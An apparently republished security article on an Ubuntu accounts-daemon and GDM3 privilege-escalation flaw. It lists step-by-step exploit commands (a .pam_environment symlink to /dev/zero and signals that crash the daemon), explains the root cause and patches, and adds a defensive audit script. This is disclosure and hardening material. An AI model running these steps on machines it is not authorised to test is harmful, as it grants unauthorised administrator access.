How to Exploit and Patch Ubuntu’s Accounts‑Daemon & GDM3 Privilege Escalation
Security researcher Kevin Backhouse revealed a local‑privilege‑escalation flaw in Ubuntu desktop that lets a standard user create a sudo‑enabled account without a password by abusing a .pam_environment symlink, crashing accounts‑daemon, and forcing GNOME’s initial‑setup wizard, with patches now available.
Vulnerability Overview
A local privilege‑escalation (LPE) bug affects Ubuntu desktop releases 20.10, 20.04, 18.04 and 16.04 LTS. A non‑privileged user can create a new sudo‑capable account without knowing the system password.
Attack Method
Create a malicious symlink named .pam_environment that points to /dev/zero in the user’s home directory.
    ln -s /dev/zero .pam_environment
If .pam_environment already exists, rename it first.
Open Settings → Region & Language and attempt to change the language. The dialog freezes because accounts-daemon is stuck.
Remove the symlink to avoid being locked out of the original account.
    rm .pam_environment
Find the PID of the hung accounts-daemon process (e.g., with pidof).
    pidof accounts-daemon
Pause the daemon with SIGSTOP.
    kill -SIGSTOP <PID>
Schedule a sequence of signals that will be executed after logout: first send SIGSEGV to crash the daemon, then SIGCONT to resume it.
    nohup bash -c "sleep 30s; kill -SIGSEGV <PID>; kill -SIGCONT <PID>" &
Log out. When the daemon crashes, GDM3 assumes zero users, launches gnome-initial-setup, and forces creation of a new user with administrator rights.
Root Cause
accounts‑daemon bug: The function is_in_pam_environment reads .pam_environment. If the file is a symlink to /dev/zero, the daemon reads an infinite stream of zeros, consumes 100% CPU and drops its root privileges.
GDM3 bug: GDM3 queries accounts-daemon to count existing users. When the daemon is unresponsive, GDM3 times out, assumes no users, and starts the initial‑setup wizard, which requires creating an admin account.
Mitigation / Official Fix
Patches addressing both bugs have been merged upstream. Users should update their Ubuntu systems immediately. The issue only affects desktop editions that use GNOME; command‑line‑only installations or alternative desktop environments are not vulnerable.
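Alongside patching, an administrator can audit for the precondition described under Attack Method. The script below is an added example, not from the original article or the researcher's write-up: it flags any home directory whose .pam_environment is a symlink or otherwise not a regular file, using only metadata checks so it never reads the target and cannot hang on /dev/zero. The function names, the /home default and the sample tree are assumptions made for illustration.

```shell
#!/bin/sh
# Audit home directories for a .pam_environment that is not a plain regular file.
# Prints one finding per line; returns 1 if anything was flagged, 0 if clean.
audit_pam_environment() {
    base=${1:-/home}            # assumption: user homes live directly under /home
    flagged=0
    for home in "$base"/*/; do
        f="${home}.pam_environment"
        user=$(basename "$home")
        if [ -L "$f" ]; then
            # Symlink: report the target (readlink does not open the target).
            echo "SYMLINK $user -> $(readlink "$f")"
            flagged=1
        elif [ -e "$f" ] && [ ! -f "$f" ]; then
            # Directory, FIFO, device node, ...: only a regular file is expected.
            echo "NOT-REGULAR $user"
            flagged=1
        fi
    done
    return "$flagged"
}

# Constructed sample tree (not real accounts): alice has a normal file,
# bob has the symlink described in this article, carol has a non-regular
# entry, dave has no .pam_environment at all.
make_constructed_homes() {
    root=$(mktemp -d)
    mkdir "$root/alice" "$root/bob" "$root/carol" "$root/dave"
    printf 'LANG=en_GB.UTF-8\n' > "$root/alice/.pam_environment"
    ln -s /dev/zero "$root/bob/.pam_environment"
    mkdir "$root/carol/.pam_environment"
    echo "$root"
}

# Demo run over the constructed tree; on a real host, call
# audit_pam_environment with no argument as root instead.
demo_root=$(make_constructed_homes)
audit_pam_environment "$demo_root" || true
rm -rf "$demo_root"
```

A non-zero return from audit_pam_environment is suitable for wiring into a cron job or configuration-management check that alerts on findings.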
References
GitHub Security Lab blog: https://securitylab.github.com/research/Ubuntu-gdm3-accountsservice-LPE
Discussion on Hacker News: https://news.ycombinator.com/item?id=25053238
Liangxu Linux
